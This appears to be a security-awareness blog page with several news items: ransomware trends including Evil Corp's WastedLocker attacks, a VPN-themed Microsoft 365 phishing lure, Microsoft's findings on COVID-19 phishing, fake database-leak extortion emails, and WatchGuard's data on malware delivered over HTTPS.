Ransomware is rapidly shaping up to be the defining online security issue of our era. It's a brutally simple idea, executed with increasing sophistication by criminal groups. A huge chunk of our lives is now stored digitally, whether that's photos, videos, business plans or customer databases. But too many of us, both businesses and consumers, have been lazy about securing these vital assets, creating an opportunity which criminals have exploited. 

Their brilliant twist was to realise they don't have to steal that data to make money: they just have to make it impossible for us to access it again -- by encrypting it -- unless we pay up.

Ransomware was once a menace mainly for consumers, but now it's a significant threat to business. Just last week, there were warnings about a new wave of ransomware attacks against at least 31 large organisations with the aim of demanding millions of dollars in ransom. The attackers had breached the networks of targeted organizations and were in the process of laying the groundwork for their attacks.

The vast majority of targets were household names, including eight Fortune 500 companies, tech security company Symantec said: if the attack (by a group calling itself Evil Corp) hadn't been disrupted, it could have led to millions in damages and downtime, with the impact felt through the supply chain.

SEE: Security Awareness and Training policy (TechRepublic Premium)

Some of the hyperbole around ransomware is overblown. It's probably over the top to describe these WastedLocker attacks as part of Evil Corp's retaliation against the US government after its leaders were indicted by the Justice Department in December -- which is how The New York Times interpreted them. (Indeed, others have argued that the gang is actually trying to attract less attention right now, which is why, so far, it has not threatened to publish information stolen from its victims.)

But it's also true that these groups are smart, sophisticated and, because around half of companies pay the ransoms, very well funded.

For example the group behind it have access to highly skilled exploit and software developers' capable of bypassing network defences on all different levels, according to researchers.

How skilled? When a version of their malware is spotted by the defences on victim networks, the group is often back with an undetectable version after just a short time.

In one case the group went so far as to pose as a potential customer to request a trial licence for a security product that was not commonly available, says FOX-IT, part of NCC Group.

The targets of the ransomware gangs have evolved, too. It's not just about PCs anymore; these gangs want to go after the really irreplaceable business assets too, which means file servers, database services, virtual machines and cloud environments. They'll also search out and encrypt any backups that organisations foolishly leave connected to the network. All of this makes it much harder for victims to recover -- unless of course they want to pay that ransom. And the attackers seem willing to take a longer view too; some of these attacks can take weeks or longer to go from the initial minor breach of network security through to complete control of the victim's corporate network.

Police forces, lacking officers trained in high-tech crime, are loath to investigate knowing that the perpetrators will be far from their jurisdiction and impossible to catch. Many businesses would rather pay up, return to business as usual and forget about the cost and the stress of the whole thing.

It's quite possible that ransomware will form the core of a new type of a digital attack, used by nation states and others who simply want to destroy networks. Wiper malware is ransomware whose encryption can't be reversed, so the data is lost forever. There have been a few of these incidents, but the fear is they could become more mainstream.

Another concern is that, as they become more confident and better funded, these criminal groups will raise their sights even higher. One new worrying trend is that gangs will steal the data as well as encrypting the network. They then threaten to leak the data as a means of pressuring the victim into paying up.

These cyber criminals often spend weeks poking around in a network before they make their attack, which means they have time to understand key digital assets, like the CEO's emails for example, allowing them to put even more pressure on their victims.

There's no obvious end to the ransomware nightmare in sight. Indeed, the likelihood is it will get even worse.


Continue reading

‘New VPN Configuration’ Email Tricks Microsoft 365 Users Out of Credentials


Scammers are taking advantage of the prominent use of VPNs by remote workforces to send out this very topically relevant phishing email that just wants to steal your credentials.

Nearly one-third of users utilize a VPN to access work-related sites and services. From a cybercriminal’s perspective, that’s a significant chunk of people they can target. The shift to remote working due to COVID-19 has caused may organizations to see the VPN as a part of work connectivity, making it a part of their user’s everyday vernacular.

So, when scammers want to come up with a viable reason for needing the user to read their phishing email, it makes sense to use the VPN as the excuse. A new phishing campaign has been spotted in the wild touting the need for users to update their VPN configuration.

While this is a poorly worded and presented phishing scam, it represents a significant risk to organizations: users that are aware of their VPN but know little about it certainly don’t want to pass on a needed update, right?

This scam takes the victim to an impersonated Microsoft 365 login page to steal presented credentials.

There are a few ways to keeps scams like this from succeeding:

  • Put Microsoft 365 multi-factor authentication in place – this will keep most scammers from being able to use the stolen credentials. But, even this security measure has been overcome.
  • Teach users not to fall for this – take a good look at the email image above. The from address doesn’t use the organization’s domain, it has terrible grammar, and specifically requires the user to “login with your email and password” (which makes no sense). Any user that has undergone Security Awareness Training would see right through this kind of scam, pressing the delete key the moment they realize it’s a bogus email.

There will always be the “next” scam that tries to convince your users that they need to log into Microsoft 365. Make sure they’re prepared.


Continue reading

Microsoft on COVID-19 Themed Cyberattacks


Microsoft’s Threat Protection Intelligence Team has published a report providing a detailed look into the proliferation of COVID-19-themed phishing over the past several months. The researchers found that the timing of these attacks was often correlated with local news stories, the better to capitalize on peoples’ fears when tensions were highest.

In the UK, for example, COVID-19-themed phishing attacks peaked when the US announced a travel ban to Europe. The country saw another spike in these attacks when Prime Minister Boris Johnson was moved to intensive care, but the attacks leveled off after Johnson was discharged from the hospital. South Korea saw a similar trend, with COVID-19 phishing peaking in May amid fears of a second wave of cases.

“Malware campaigns, attack infrastructure, and phishing attacks all showed signs of this opportunistic behavior,” the researchers write. “These shifts were typical of the global threat landscape, but what was peculiar in this case was how the global nature and universal impact of the crisis made the cybercriminal’s work easier. They preyed on our concern, confusion, and desire for resolution.”

Interestingly, the researchers present a graph showing that the global spike in COVID-19-themed phishing lures is “barely a blip” when viewed against the total number of phishing attempts during the same period. This indicates that cybercriminals continued operating as normal throughout the crisis, but modified some of their lures to exploit current events. The researchers explain that this strategy is consistent with how cybercriminals have always functioned.

“Cybercriminals are adaptable and always looking for the best and easiest ways to gain new victims,” the researchers write. “Commodity malware attacks, in particular, are looking for the biggest risk-versus-reward payouts. The industry sometimes focuses heavily on advanced attacks that exploit zero-day vulnerabilities, but every day the bigger risk for more people is being tricked into running unknown programs or Trojanized documents. Likewise, defenders adapt and drive up the cost of successful attacks. Starting in April, we observed defenders greatly increasing phishing awareness and training for their enterprises, raising the cost and complexity barrier for cybercriminals targeting their employees. These dynamics behave very much like economic models if you turn ‘sellers’ to ‘cybercriminals’ and ‘customers’ to ‘victims.’”

Microsoft concludes that organizations should invest in cross-domain signal analysis, patch management, and user education to ensure all their bases are covered. Attackers will always be shifting their tactics to overcome new security measures. New-school security awareness training can help your employees stay informed about the evolving threat landscape.


Continue reading

Phony Data Theft, Like Phony Sextortion


Extortionists are sending phony threats to website owners informing them that their sites’ databases will be leaked unless they pay a ransom of between $1,500 and $3,000, BleepingComputer reports. The scammers claim to have discovered a vulnerability in the target’s website that allowed them to steal the victim’s entire “database,” and they say they’ll either sell or publish the data to destroy the site’s reputation unless the victim pays up within five days.

“We will systematically go through a series of steps of totally damaging your reputation,” the email says. “First your database will be leaked or sold to the highest bidder which they will use with whatever their intentions are. Next if there are e-mails found they will be e-mailed that their information has been sold or leaked and your site [website URL] was at fault thusly damaging your reputation and having angry customers/associates with whatever angry customers/associates do. Lastly any links that you have indexed in the search engines will be de-indexed based off of blackhat techniques that we used in the past to de-index our targets.”

These emails are effective because the threats are plausible, or at least difficult to completely disprove. The website’s administrator might not be able to determine if the vague claim is true before the deadline hits, and the threats to manipulate the site’s SEO standing would grab the attention of any website owner. Additionally, many ransomware operators are now employing similar tactics by stealing data before encrypting it in place, and then using the stolen data as leverage in their ransom demands.

However, BleepingComputer points out that the emails don’t offer any evidence that the site was hacked. If the attackers had actually exfiltrated any data, on form they would prove it by sending a sample of the data, or pointing to the vulnerability they exploited.

This scam is similar to a common sextortion technique in which a scammer claims to have embarrassing webcam footage of the recipient. The recipient has no way of knowing for sure whether the claims are true, so they might end up sending the money just in case.

People who receive these types of emails should assume the claims are bogus, and searching the Internet can provide further reassurance. In this case, BleepingComputer links to multiple examples of people posting on support forums asking if the emails are legitimate, showing that the scammers are indiscriminately sending out the same email template to many website and blog owners in the hope that some will fall for the scheme.

Caving to these types of extortionists is never a good idea. Even if your site’s data was actually stolen, paying a ransom is no guarantee that the attackers won’t sell the data anyway, and there’s nothing stopping them from coming back for more money. New-school security awareness training can teach your employees to remain calm and seek out trustworthy advice when they’re targeted with these tactics.


Continue reading

Two thirds of malware is invisible without HTTPS inspection


A new report from WatchGuard Technologies shows that 67 percent of all malware in the first quarter of this year was delivered via HTTPS, so organizations without security solutions capable of inspecting encrypted traffic will miss two-thirds of incoming threats.

In addition, 72 percent of encrypted malware was classified as zero day (meaning no antivirus signature exists for it, and it will evade signature-based protections). The findings suggest that HTTPS inspection and advanced behavior-based threat detection and response solutions are now requirements for every security-conscious organization.

"Some organizations are reluctant to set up HTTPS inspection due to the extra work involved, but our threat data clearly shows that a majority of malware is delivered through encrypted connections and that letting traffic go uninspected is simply no longer an option," says Corey Nachreiner, chief technology officer at WatchGuard. "As malware continues to become more advanced and evasive, the only reliable approach to defense is implementing a set of layered security services, including advanced threat detection methods and HTTPS inspection."

Other findings of the report include a jump in cryptomining activity. Five of the top 10 domains distributing malware in Q1 (identified by WatchGuard's DNS filtering service DNSWatch) either hosted or controlled Monero cryptominers.

A three-year-old Adobe Acrobat Reader exploit that was patched back in August 2017 appeared in WatchGuard's top network attacks list for the first time in Q1 too. Overall though there were 6.9 percent fewer malware hits and 11.6 percent fewer network attacks in Q1.


Continue reading